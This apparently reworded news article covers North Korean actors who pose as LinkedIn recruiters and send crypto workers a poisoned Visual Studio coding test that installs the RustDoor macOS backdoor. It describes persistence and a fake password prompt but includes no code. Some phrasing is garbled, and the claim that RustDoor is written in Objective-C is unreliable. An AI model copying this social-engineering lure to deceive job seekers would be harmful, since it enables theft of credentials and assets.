“Stay Alert: North Korean Cyber Threats Loom on LinkedIn, Targeting Crypto and DeFi Sectors with RustDoor Malware”
Understanding RustDoor: North Korea’s Latest Cyber Threat via LinkedIn and Its Impact on Cryptocurrency Sectors
Cybersecurity researchers are sounding the alarm about sophisticated attempts by North Korean threat actors to target unsuspecting victims on LinkedIn. These attackers masquerade as recruiters from legitimate businesses, such as the decentralized cryptocurrency exchange STON.fi, only to deliver a dangerous malware known as RustDoor.
This alarming trend is part of a broader, attack taking place at several points simultaneously campaign by cyber operatives backed by the Democratic People’s Republic of Korea (DPRK). Their process involves infiltrating networks of interest under the guise of conducting job interviews or coding assignments. The financial and cryptocurrency sectors, rich in digital assets and sensitive information, are particularly lucrative targets for these state-sponsored adversaries. Their goal? To generate illicit revenue and fulfill objectives that align with the regime’s strategic interests.
The U.S. Federal Bureau of Investigation (FBI) recently highlighted these “highly tailored, difficult-to-detect social engineering campaigns” aimed at employees within the decentralized finance (DeFi) and cryptocurrency industries. One common tactic includes requests to execute code or download applications on devices that have access to a company’s internal network. Another red flag is the solicitation to complete a ‘pre-employment test’ or debugging exercise involving non-standard or unfamiliar Node.js packages, PyPI packages, scripts, or GitHub repositories.
These tactics have been extensively documented in recent weeks, showcasing a disturbing evolution in the tools and methods used by these threat actors. The latest attack chain identified by Jamf Threat Labs involves deceiving the victim into downloading a compromised Visual Studio project. This project appears to be part of a coding challenge but is actually embedded with bash commands designed to download two different second-stage payloads, both functioning identically as RustDoor.
Interestingly, when this zipped coding test file was uploaded to the VirusTotal platform on August 7, 2024, none of the anti-malware engines flagged it as malicious. This indicates a sophisticated level of obfuscation that could bypass traditional antivirus solutions. According to researchers Jaron Bradley and Ferdous Saljooki, “The config files embedded within the two separate malware samples show that VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file.”
RustDoor, initially documented by Bitdefender in February 2024 targeting cryptocurrency firms, is a macOS backdoor written in Objective-C. A subsequent analysis revealed a Golang variant named GateDoor intended for Windows machines. The findings from Jamf are particularly significant as they mark the first formal attribution of this malware to North Korean threat actors.
Moreover, VisualStudioHelper is designed not only as a backdoor but also as an information stealer. It prompts the user to enter their system password under the guise of a request from the Visual Studio app—a clever trick to avoid raising suspicions while harvesting specified files from the victim’s system.
Both payloads maintain communication with their command-and-control servers using different methods, underscoring the sophisticated nature of this cyber espionage operation. As these threat actors continue to refine their strategies to target individuals in the crypto industry, it becomes crucial for companies to train their employees—including developers—to be wary of unsolicited contacts on social media asking them to run software.
These social engineering schemes orchestrated by DPRK are not only well-crafted but also executed by individuals who are proficient in English and have done their homework on their targets. This makes them particularly dangerous and difficult to detect, leaving many professionals in the cryptocurrency sector vulnerable to exploitation.
